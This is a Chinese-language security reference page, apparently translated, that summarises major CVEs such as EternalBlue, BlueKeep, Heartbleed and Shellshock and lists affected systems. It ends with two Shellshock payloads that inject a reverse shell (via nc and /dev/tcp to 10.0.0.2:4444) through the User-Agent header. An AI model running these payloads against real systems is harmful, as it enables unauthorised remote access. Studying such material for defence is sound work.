跳转至

常见漏洞与披露 (Common Vulnerabilities and Exposures)

CVE (常见漏洞与披露) 是分配给公开已知的网络安全漏洞的唯一标识符。CVE 有助于标准化漏洞的命名和跟踪,使组织、安全专业人员和软件供应商更轻松地共享信息并管理与这些漏洞相关的风险。每个 CVE 条目都包含漏洞的简要描述、其潜在影响以及受影响的软件或系统的详细信息。

摘要 (Summary)

工具 (Tools)

过去 15 年的重大 CVE (Big CVEs in the last 15 years)

CVE-2017-0144 - 永恒之蓝 (EternalBlue)

EternalBlue 利用了 Microsoft 对服务器消息块 (SMB) 协议实现中的漏洞。该漏洞存在的原因是各种版本的 Microsoft Windows 中的 SMB 版本 1 (SMBv1) 服务器错误处理了来自远程攻击者的特殊构造数据包,从而允许他们在目标计算机上执行任意代码。

受影响的系统:

  • Windows Vista SP2
  • Windows Server 2008 SP2 和 R2 SP1
  • Windows 7 SP1
  • Windows 8.1
  • Windows Server 2012 Gold 和 R2
  • Windows RT 8.1
  • Windows 10 Gold, 1511, 和 1607
  • Windows Server 2016

CVE-2017-5638 - Apache Struts 2

3 月 6 日,一个 Apache Struts 2 中的新远程代码执行 (RCE) 漏洞被公开。这个名为 CVE-2017-5638 的漏洞允许远程攻击者通过“Content-Type”标头向 Web 应用程序注入操作系统命令。

CVE-2018-7600 - Drupalgeddon 2

Drupal 7.x 和 8.x 的多个子系统中存在远程代码执行漏洞。这可能允许攻击者在 Drupal 站点上利用多个攻击向量,从而导致站点被完全控制。

CVE-2019-0708 - BlueKeep

远程桌面服务(以前称为终端服务)中存在远程代码执行漏洞。当未经身份验证的攻击者使用 RDP 连接到目标系统并发送特殊构造的请求时,就会触发该漏洞。此漏洞发生在身份验证之前,且不需要用户交互。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。攻击者随后可以安装程序;查看、更改或删除数据;或创建具有完全用户权限的新账户。

CVE-2019-19781 - Citrix ADC Netscaler

Citrix Application Delivery Controller (ADC)(以前称为 NetScaler ADC)和 Citrix Gateway(以前称为 NetScaler Gateway)中存在远程代码执行漏洞。如果被利用,可能允许未经身份验证的攻击者执行任意代码。

受影响的产品:

  • Citrix ADC 和 Citrix Gateway 13.0 版本的所有支持构建
  • Citrix ADC 和 NetScaler Gateway 12.1 版本的所有支持构建
  • Citrix ADC 和 NetScaler Gateway 12.0 版本的所有支持构建
  • Citrix ADC 和 NetScaler Gateway 11.1 版本的所有支持构建
  • Citrix NetScaler ADC 和 NetScaler Gateway 10.5 版本的所有支持构建

CVE-2014-0160 - 心脏出血 (Heartbleed)

心脏出血 (Heartbleed) 是流行的 OpenSSL 密码软件库中的一个严重漏洞。该弱点允许窃取在正常情况下由用于保护互联网安全的 SSL/TLS 加密所保护的信息。SSL/TLS 为 Web、电子邮件、即时消息 (IM) 和某些虚拟专用网络 (VPN) 等应用程序在互联网上提供通信安全和隐私。

CVE-2014-6271 - Shellshock

Shellshock(也称为 Bashdoor)是广泛使用的 Unix Bash shell 中的一系列安全漏洞,其中第一个漏洞于 2014 年 9 月 24 日披露。许多面向互联网的服务(如某些 Web 服务器部署)使用 Bash 处理某些请求,允许攻击者导致易受攻击版本的 Bash 执行任意命令。这可能允许攻击者获得对计算机系统的未经授权访问。

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\r\n"
curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi" 

参考资料 (References)